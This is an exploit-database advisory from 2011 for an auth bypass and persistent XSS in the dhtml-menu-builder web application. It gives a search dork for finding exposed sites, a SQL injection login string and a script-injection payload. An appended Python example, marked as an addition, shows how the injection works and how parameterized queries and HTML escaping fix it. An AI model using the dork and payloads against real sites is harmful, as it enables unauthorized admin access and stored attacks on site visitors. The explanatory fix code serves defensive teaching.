zdt | Sid3^effects | 1337DAY-ID-16041
May 06, 2011 - 12:00 a.m.

dhtml-menu-builder Auth bypass and Persistent XSS Vulnerability

2011-05-06 00:00:00
Sid3^effects
0day.today

Exploit for php platform in category web applications

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               #############################################          1
#0                I'm Sid3^effects member from Inj3ct0r Team            1
#1               #############################################          0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#Name : dhtml-menu-builder Auth bypass and Persistent XSS Vulnerability
#Date : May 06, 2011
#Vendor Url : http://dhtml-menu-builder.com/
#Dork: Powered By: "Powered by dhtml-menu-builder.com" inurl:.asp?id=
#Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
#Big hugs : Th3 RDX,Hanan_butt,Sugar
#special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,SeeMe,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!,cr1m1n4l
###############################################################################################################

About:

Sothink DHTML Menu is the best drop down menu builder, which creates great JavaScript menus without coding.

###############################################################################################################

Auth Bypass Vulnerability :
#########################

Use ' or 1=1 or ''=' in both the login and password fields and you're in ;). This was just for fun :=)

SQLi was found by Caddy-Dz on the same web app.


Persistent XSS Vulnerability:
############################

The XSS vulnerability was checked with admin rights.
Insert any script (like "><script>alert(/woot/)</script>) and just update it. :)
###############################################################################################################
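
Why the quoted login string is accepted, and what the two fixes look like, as an added example that is not from the advisory or the vendor. The product's source is not on the page, so the concatenated query, the table layout, the "caption" field and all function names are assumptions, written in Python with SQLite rather than the product's ASP.

```python
import html
import sqlite3

SQLI = "' or 1=1 or ''='"                    # login/password string quoted in the advisory
XSS = '"><script>alert(/woot/)</script>'     # stored-XSS test string from the advisory

def make_db():
    """In-memory table with one constructed account (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, password TEXT)")
    # Constructed row; a real table would hold a salted password hash, not plain text.
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", "S3cret!"))
    return db

def login_concatenated(db, login, password):
    """Assumed vulnerable pattern: both fields are pasted into the SQL text."""
    sql = ("SELECT 1 FROM users WHERE login = '" + login +
           "' AND password = '" + password + "'")
    # With SQLI in both fields the WHERE clause becomes
    #   login = '' or 1=1 or ''='' AND password = '' or 1=1 or ''=''
    # which is true for every row, so a row always comes back.
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, login, password):
    """Hardened: values are bound as data and never parsed as SQL."""
    sql = "SELECT 1 FROM users WHERE login = ? AND password = ?"
    return db.execute(sql, (login, password)).fetchone() is not None

def render_field(value):
    """Hardened output: encode a stored value before placing it in an attribute."""
    return '<input name="caption" value="' + html.escape(value, quote=True) + '">'

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", login_concatenated(db, SQLI, SQLI))
    print("parameterized:", login_parameterized(db, SQLI, SQLI))
    print(render_field(XSS))
```
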



#  0day.today [2018-01-10]  #